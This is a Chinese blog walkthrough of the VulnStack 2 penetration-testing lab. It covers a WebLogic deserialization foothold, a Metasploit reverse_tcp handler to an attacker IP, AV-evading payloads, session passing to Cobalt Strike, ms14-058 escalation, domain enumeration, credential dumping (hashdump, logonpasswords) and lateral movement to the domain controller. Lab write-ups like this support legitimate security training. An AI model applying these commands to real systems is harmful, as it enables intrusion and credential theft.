内网渗透靶机-VulnStack 2

目录

内网渗透靶机-VulnStack 2

主机发现

端口扫描

192.168.111.128

192.168.111.201

漏洞利用

内网信息收集

ipconfig /all

Tasklist

shell net group "domain users" /domain

shell net group “domain admins” /domain

shell net group “domain computers” /domain

shell net group “domain controllers” /domain

shell net time /domain

shell nslookup DC.de1ay.com

抓取WEB主机的密码

内网横向


内网渗透靶机-VulnStack 2

主机发现

发现存在192.168.111.128、192.168.111.201两台目标主机,192.168.111.130为kali攻击机

端口扫描

192.168.111.128

192.168.111.201

漏洞利用

445端口存在永恒之蓝漏洞,可能存在杀毒软件所以无法利用

192.168.111.128 7001端口存在反序列化漏洞

上传马

在kali上执行如下命令:

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.111.130; set lport 4444; run; "

使用掩日2.1生成msf免杀马,使用冰鞋上传并且执行

Msf成功上线

msf上线cs

msf使用注入模块 + cs创建Listener监听 (相同payload)

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost (cs listener ip)

set lport (cs listener port)

set session (id)

Run

CS成功上线

使用ms14-058提权

内网信息收集

ipconfig /all

存在域de1ay.com

两个网卡,ip分别为192.168.111.128、10.10.10.80

Tasklist

查看进程,存在360杀毒

shell net group "domain users" /domain

查看域用户,存在用户Administrator、de1ay、krbtgt、mssql

shell net group “domain admins” /domain

查看域管理员账号,域管理员账号为Administrator

shell net group “domain computers” /domain

查看域中的机器,除了域控之外还有WEB和PC两台机器

shell net group “domain controllers” /domain

查看域控制器

shell net time /domain

查询域控主机名

shell nslookup DC.de1ay.com

查询域控对应的ip

内网另外一台机器的ip为

抓取WEB主机的密码

hashdump
logonpasswords

内网横向

尝试使用cs横向

首先建立一个smb监听

利用上面爬取到的密码进行横向

成功拿到域控的权限

按照上面的方法,同样拿下PC机器

成果如图所示:

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值